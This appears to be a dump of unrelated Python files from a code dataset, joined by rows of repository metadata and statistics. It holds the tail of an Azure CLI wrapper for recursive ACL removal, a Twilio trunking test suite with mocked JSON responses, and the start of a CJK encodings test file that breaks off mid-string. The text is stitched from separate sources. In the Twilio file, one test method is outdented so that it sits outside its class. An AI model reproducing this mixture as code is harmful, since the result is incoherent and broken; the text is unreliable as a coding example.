    - batch_size -- split large data sets into batches of this many requests (1-2000, default 2000) so progress can be tracked
    - connection_string -- storage account connection string (env: AZURE_STORAGE_CONNECTION_STRING)
    - continuation -- continuation token to resume a previously stopped operation
    - continue_on_failure -- if True, ignore user errors (4XX) and continue on other sub-entities; a continuation token is then returned on user errors. Default False
    - max_batches -- maximum number of batches a single operation may run; if hit, resume with the continuation token. Empty means unbounded
    - sas_token -- Shared Access Signature; pair with account_name (env: AZURE_STORAGE_SAS_TOKEN)
    - timeout -- request timeout in seconds, applied to each call to the service
    '''
    # locals() must hold exactly the declared parameters here, since _call_az
    # maps them onto CLI flags -- do not introduce local variables above this.
    return _call_az("az storage fs access remove-recursive", locals())
| 125.048544 | 405 | 0.783152 | 1,941 | 12,880 | 5.11695 | 0.114374 | 0.056383 | 0.060411 | 0.078031 | 0.937072 | 0.932038 | 0.918546 | 0.912908 | 0.912304 | 0.908176 | 0 | 0.003803 | 0.163043 | 12,880 | 102 | 406 | 126.27451 | 0.917532 | 0.875854 | 0 | 0 | 0 | 0 | 0.121236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
312f7ac14118532cec9fd393358a3b3cbff237a9 | 11,077 | py | Python | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 1,362 | 2015-01-04T10:25:18.000Z | 2022-03-24T10:07:08.000Z | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 299 | 2015-01-30T09:52:39.000Z | 2022-03-31T23:03:02.000Z | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 622 | 2015-01-03T04:43:09.000Z | 2022-03-29T14:11:00.000Z | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class TrunkTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferor",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
))
actual = self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks.create()
self.holodeck.assert_has_request(Request(
'post',
'https://trunking.twilio.com/v1/Trunks',
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferee",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
))
actual = self.client.trunking.v1.trunks.create()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks.list()
self.holodeck.assert_has_request(Request(
'get',
'https://trunking.twilio.com/v1/Trunks',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"page_size": 50,
"key": "trunks",
"next_page_url": null,
"page": 0,
"previous_page_url": null
},
"trunks": [
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferee",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
]
}
'''
))
actual = self.client.trunking.v1.trunks.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"page_size": 50,
"key": "trunks",
"next_page_url": null,
"page": 0,
"previous_page_url": null
},
"trunks": []
}
'''
))
actual = self.client.trunking.v1.trunks.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
    """A successful trunk update (200 + full instance payload) parses cleanly.

    Mocks a 200 response carrying a complete trunk resource and verifies
    ``update()`` returns a non-None instance.
    """
    updated_trunk_body = '''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "GET",
"disaster_recovery_url": "http://updated-recovery.com",
"friendly_name": "updated_name",
"secure": true,
"cnam_lookup_enabled": true,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferor",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
    # Queue the canned success payload, then exercise the update call.
    self.holodeck.mock(Response(200, updated_trunk_body))
    trunk_sid = "TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
    result = self.client.trunking.v1.trunks(trunk_sid).update()
    self.assertIsNotNone(result)
| 41.178439 | 151 | 0.54383 | 895 | 11,077 | 6.559777 | 0.13743 | 0.054505 | 0.093851 | 0.10867 | 0.923182 | 0.913643 | 0.896099 | 0.891671 | 0.87055 | 0.84449 | 0 | 0.028015 | 0.332942 | 11,077 | 268 | 152 | 41.33209 | 0.766545 | 0.00984 | 0 | 0.626506 | 1 | 0 | 0.151043 | 0.059947 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.13253 | false | 0 | 0.048193 | 0 | 0.192771 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31432d19fd1a0323166379e4b5a75b9c2f18c106 | 66,874 | py | Python | Lib/test/cjkencodings_test.py | arvindm95/unladen-swallow | 8175e37eaea7ca66ed03283b46bc1d2db0d3f9c3 | [
"PSF-2.0"
] | 2,293 | 2015-01-02T12:46:10.000Z | 2022-03-29T09:45:43.000Z | python/src/Lib/test/cjkencodings_test.py | weiqiangzheng/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 315 | 2015-05-31T11:55:46.000Z | 2022-01-12T08:36:37.000Z | python/src/Lib/test/cjkencodings_test.py | weiqiangzheng/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 1,033 | 2015-01-04T07:48:40.000Z | 2022-03-24T09:34:37.000Z | teststring = {
'big5': (
"\xa6\x70\xa6\xf3\xa6\x62\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xa4"
"\xa8\xcf\xa5\xce\xac\x4a\xa6\xb3\xaa\xba\x20\x43\x20\x6c\x69\x62"
"\x72\x61\x72\x79\x3f\x0a\xa1\x40\xa6\x62\xb8\xea\xb0\x54\xac\xec"
"\xa7\xde\xa7\xd6\xb3\x74\xb5\x6f\xae\x69\xaa\xba\xa4\xb5\xa4\xd1"
"\x2c\x20\xb6\x7d\xb5\x6f\xa4\xce\xb4\xfa\xb8\xd5\xb3\x6e\xc5\xe9"
"\xaa\xba\xb3\x74\xab\xd7\xac\x4f\xa4\xa3\xae\x65\xa9\xbf\xb5\xf8"
"\xaa\xba\x0a\xbd\xd2\xc3\x44\x2e\x20\xac\xb0\xa5\x5b\xa7\xd6\xb6"
"\x7d\xb5\x6f\xa4\xce\xb4\xfa\xb8\xd5\xaa\xba\xb3\x74\xab\xd7\x2c"
"\x20\xa7\xda\xad\xcc\xab\x4b\xb1\x60\xa7\xc6\xb1\xe6\xaf\xe0\xa7"
"\x51\xa5\xce\xa4\x40\xa8\xc7\xa4\x77\xb6\x7d\xb5\x6f\xa6\x6e\xaa"
"\xba\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xa8\xc3\xa6\xb3\xa4"
"\x40\xad\xd3\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79"
"\x70\x69\x6e\x67\x20\xaa\xba\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d"
"\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20\xa5\x69\x0a"
"\xa8\xd1\xa8\xcf\xa5\xce\x2e\x20\xa5\xd8\xab\x65\xa6\xb3\xb3\x5c"
"\xb3\x5c\xa6\x68\xa6\x68\xaa\xba\x20\x6c\x69\x62\x72\x61\x72\x79"
"\x20\xac\x4f\xa5\x48\x20\x43\x20\xbc\x67\xa6\xa8\x2c\x20\xa6\xd3"
"\x20\x50\x79\x74\x68\x6f\x6e\x20\xac\x4f\xa4\x40\xad\xd3\x0a\x66"
"\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20"
"\xaa\xba\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c"
"\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xac\x47\xa7\xda\xad\xcc\xa7"
"\xc6\xb1\xe6\xaf\xe0\xb1\x4e\xac\x4a\xa6\xb3\xaa\xba\x0a\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x20\xae\xb3\xa8\xec\x20\x50\x79\x74"
"\x68\x6f\x6e\x20\xaa\xba\xc0\xf4\xb9\xd2\xa4\xa4\xb4\xfa\xb8\xd5"
"\xa4\xce\xbe\xe3\xa6\x58\x2e\x20\xa8\xe4\xa4\xa4\xb3\xcc\xa5\x44"
"\xad\x6e\xa4\x5d\xac\x4f\xa7\xda\xad\xcc\xa9\xd2\x0a\xad\x6e\xb0"
"\x51\xbd\xd7\xaa\xba\xb0\xdd\xc3\x44\xb4\x4e\xac\x4f\x3a\x0a\x0a",
"\xe5\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3"
"\x80\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a"
"\x80\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84"
"\xe4\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f"
"\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84"
"\xe9\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5"
"\xbf\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e"
"\x20\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc"
"\xe5\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5"
"\xba\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8"
"\xe5\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4"
"\xb8\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5"
"\xbd\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8"
"\xa6\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20"
"\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20"
"\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67"
"\x75\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7"
"\x94\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1"
"\xe8\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62"
"\x72\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf"
"\xab\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20"
"\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20"
"\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67"
"\x75\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c"
"\x89\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6"
"\x8b\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84"
"\xe7\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5"
"\x8f\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad"
"\xe6\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6"
"\x88\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8"
"\xab\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98"
"\xaf\x3a\x0a\x0a"),
'big5hkscs': (
"\x88\x45\x88\x5c\x8a\x73\x8b\xda\x8d\xd8\x0a\x88\x66\x88\x62\x88"
"\xa7\x20\x88\xa7\x88\xa3\x0a",
"\xf0\xa0\x84\x8c\xc4\x9a\xe9\xb5\xae\xe7\xbd\x93\xe6\xb4\x86\x0a"
"\xc3\x8a\xc3\x8a\xcc\x84\xc3\xaa\x20\xc3\xaa\xc3\xaa\xcc\x84\x0a"),
'cp949': (
"\x8c\x63\xb9\xe6\xb0\xa2\xc7\xcf\x20\xbc\x84\xbd\xc3\xc4\xdd\xb6"
"\xf3\x0a\x0a\xa8\xc0\xa8\xc0\xb3\xb3\x21\x21\x20\xec\xd7\xce\xfa"
"\xea\xc5\xc6\xd0\x92\xe6\x90\x70\xb1\xc5\x20\xa8\xde\xa8\xd3\xc4"
"\x52\xa2\xaf\xa2\xaf\xa2\xaf\x20\xb1\xe0\x8a\x96\x20\xa8\xd1\xb5"
"\xb3\x20\xa8\xc0\x2e\x20\x2e\x0a\xe4\xac\xbf\xb5\xa8\xd1\xb4\xc9"
"\xc8\xc2\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xbc\xad\xbf\xef\xb7"
"\xef\x20\xb5\xaf\xc7\xd0\xeb\xe0\x20\xca\xab\xc4\x52\x20\x21\x20"
"\x21\x20\x21\xa4\xd0\x2e\xa4\xd0\x0a\xc8\xe5\xc8\xe5\xc8\xe5\x20"
"\xa4\xa1\xa4\xa1\xa4\xa1\xa1\xd9\xa4\xd0\x5f\xa4\xd0\x20\xbe\xee"
"\x90\x8a\x20\xc5\xcb\xc4\xe2\x83\x4f\x20\xb5\xae\xc0\xc0\x20\xaf"
"\x68\xce\xfa\xb5\xe9\xeb\xe0\x20\xa8\xc0\xb5\xe5\x83\x4f\x0a\xbc"
"\xb3\x90\x6a\x20\xca\xab\xc4\x52\x20\x2e\x20\x2e\x20\x2e\x20\x2e"
"\x20\xb1\xbc\xbe\xd6\x9a\x66\x20\xa8\xd1\xb1\xc5\x20\xa8\xde\x90"
"\x74\xa8\xc2\x83\x4f\x20\xec\xd7\xec\xd2\xf4\xb9\xe5\xfc\xf1\xe9"
"\xb1\xee\xa3\x8e\x0a\xbf\xcd\xbe\xac\xc4\x52\x20\x21\x20\x21\x20"
"\xe4\xac\xbf\xb5\xa8\xd1\x20\xca\xab\xb4\xc9\xb1\xc5\x20\xa1\xd9"
"\xdf\xbe\xb0\xfc\x20\xbe\xf8\xb4\xc9\xb1\xc5\xb4\xc9\x20\xe4\xac"
"\xb4\xc9\xb5\xd8\xc4\x52\x20\xb1\xdb\xbe\xd6\x8a\xdb\x0a\xa8\xde"
"\xb7\xc1\xb5\xe0\xce\xfa\x20\x9a\xc3\xc7\xb4\xbd\xa4\xc4\x52\x20"
"\xbe\xee\x90\x8a\x20\xec\xd7\xec\xd2\xf4\xb9\xe5\xfc\xf1\xe9\x9a"
"\xc4\xa8\xef\xb5\xe9\x9d\xda\x21\x21\x20\xa8\xc0\xa8\xc0\xb3\xb3"
"\xa2\xbd\x20\xa1\xd2\xa1\xd2\x2a\x0a\x0a",
"\xeb\x98\xa0\xeb\xb0\xa9\xea\xb0\x81\xed\x95\x98\x20\xed\x8e\xb2"
"\xec\x8b\x9c\xec\xbd\x9c\xeb\x9d\xbc\x0a\x0a\xe3\x89\xaf\xe3\x89"
"\xaf\xeb\x82\xa9\x21\x21\x20\xe5\x9b\xa0\xe4\xb9\x9d\xe6\x9c\x88"
"\xed\x8c\xa8\xeb\xaf\xa4\xeb\xa6\x94\xea\xb6\x88\x20\xe2\x93\xa1"
"\xe2\x93\x96\xed\x9b\x80\xc2\xbf\xc2\xbf\xc2\xbf\x20\xea\xb8\x8d"
"\xeb\x92\x99\x20\xe2\x93\x94\xeb\x8e\xa8\x20\xe3\x89\xaf\x2e\x20"
"\x2e\x0a\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94\xeb\x8a\xa5\xed\x9a"
"\xb9\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xec\x84\x9c\xec\x9a\xb8"
"\xeb\xa4\x84\x20\xeb\x8e\x90\xed\x95\x99\xe4\xb9\x99\x20\xe5\xae"
"\xb6\xed\x9b\x80\x20\x21\x20\x21\x20\x21\xe3\x85\xa0\x2e\xe3\x85"
"\xa0\x0a\xed\x9d\x90\xed\x9d\x90\xed\x9d\x90\x20\xe3\x84\xb1\xe3"
"\x84\xb1\xe3\x84\xb1\xe2\x98\x86\xe3\x85\xa0\x5f\xe3\x85\xa0\x20"
"\xec\x96\xb4\xeb\xa6\xa8\x20\xed\x83\xb8\xec\xbd\xb0\xea\xb8\x90"
"\x20\xeb\x8e\x8c\xec\x9d\x91\x20\xec\xb9\x91\xe4\xb9\x9d\xeb\x93"
"\xa4\xe4\xb9\x99\x20\xe3\x89\xaf\xeb\x93\x9c\xea\xb8\x90\x0a\xec"
"\x84\xa4\xeb\xa6\x8c\x20\xe5\xae\xb6\xed\x9b\x80\x20\x2e\x20\x2e"
"\x20\x2e\x20\x2e\x20\xea\xb5\xb4\xec\x95\xa0\xec\x89\x8c\x20\xe2"
"\x93\x94\xea\xb6\x88\x20\xe2\x93\xa1\xeb\xa6\x98\xe3\x89\xb1\xea"
"\xb8\x90\x20\xe5\x9b\xa0\xe4\xbb\x81\xe5\xb7\x9d\xef\xa6\x81\xe4"
"\xb8\xad\xea\xb9\x8c\xec\xa6\xbc\x0a\xec\x99\x80\xec\x92\x80\xed"
"\x9b\x80\x20\x21\x20\x21\x20\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94"
"\x20\xe5\xae\xb6\xeb\x8a\xa5\xea\xb6\x88\x20\xe2\x98\x86\xe4\xb8"
"\x8a\xea\xb4\x80\x20\xec\x97\x86\xeb\x8a\xa5\xea\xb6\x88\xeb\x8a"
"\xa5\x20\xe4\xba\x9e\xeb\x8a\xa5\xeb\x92\x88\xed\x9b\x80\x20\xea"
"\xb8\x80\xec\x95\xa0\xeb\x93\xb4\x0a\xe2\x93\xa1\xeb\xa0\xa4\xeb"
"\x93\x80\xe4\xb9\x9d\x20\xec\x8b\x80\xed\x92\x94\xec\x88\xb4\xed"
"\x9b\x80\x20\xec\x96\xb4\xeb\xa6\xa8\x20\xe5\x9b\xa0\xe4\xbb\x81"
"\xe5\xb7\x9d\xef\xa6\x81\xe4\xb8\xad\xec\x8b\x81\xe2\x91\xa8\xeb"
"\x93\xa4\xec\x95\x9c\x21\x21\x20\xe3\x89\xaf\xe3\x89\xaf\xeb\x82"
"\xa9\xe2\x99\xa1\x20\xe2\x8c\x92\xe2\x8c\x92\x2a\x0a\x0a"),
'euc_jisx0213': (
"\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb3\xab\xc8\xaf\xa4\xcf\xa1"
"\xa2\x31\x39\x39\x30\x20\xc7\xaf\xa4\xb4\xa4\xed\xa4\xab\xa4\xe9"
"\xb3\xab\xbb\xcf\xa4\xb5\xa4\xec\xa4\xc6\xa4\xa4\xa4\xde\xa4\xb9"
"\xa1\xa3\x0a\xb3\xab\xc8\xaf\xbc\xd4\xa4\xce\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\xa4\xcf\xb6"
"\xb5\xb0\xe9\xcd\xd1\xa4\xce\xa5\xd7\xa5\xed\xa5\xb0\xa5\xe9\xa5"
"\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa1\xd6\x41\x42\x43\xa1\xd7"
"\xa4\xce\xb3\xab\xc8\xaf\xa4\xcb\xbb\xb2\xb2\xc3\xa4\xb7\xa4\xc6"
"\xa4\xa4\xa4\xde\xa4\xb7\xa4\xbf\xa4\xac\xa1\xa2\x41\x42\x43\x20"
"\xa4\xcf\xbc\xc2\xcd\xd1\xbe\xe5\xa4\xce\xcc\xdc\xc5\xaa\xa4\xcb"
"\xa4\xcf\xa4\xa2\xa4\xde\xa4\xea\xc5\xac\xa4\xb7\xa4\xc6\xa4\xa4"
"\xa4\xde\xa4\xbb\xa4\xf3\xa4\xc7\xa4\xb7\xa4\xbf\xa1\xa3\x0a\xa4"
"\xb3\xa4\xce\xa4\xbf\xa4\xe1\xa1\xa2\x47\x75\x69\x64\x6f\x20\xa4"
"\xcf\xa4\xe8\xa4\xea\xbc\xc2\xcd\xd1\xc5\xaa\xa4\xca\xa5\xd7\xa5"
"\xed\xa5\xb0\xa5\xe9\xa5\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa4"
"\xce\xb3\xab\xc8\xaf\xa4\xf2\xb3\xab\xbb\xcf\xa4\xb7\xa1\xa2\xb1"
"\xd1\xb9\xf1\x20\x42\x42\x53\x20\xca\xfc\xc1\xf7\xa4\xce\xa5\xb3"
"\xa5\xe1\xa5\xc7\xa5\xa3\xc8\xd6\xc1\xc8\xa1\xd6\xa5\xe2\xa5\xf3"
"\xa5\xc6\xa5\xa3\x20\xa5\xd1\xa5\xa4\xa5\xbd\xa5\xf3\xa1\xd7\xa4"
"\xce\xa5\xd5\xa5\xa1\xa5\xf3\xa4\xc7\xa4\xa2\xa4\xeb\x20\x47\x75"
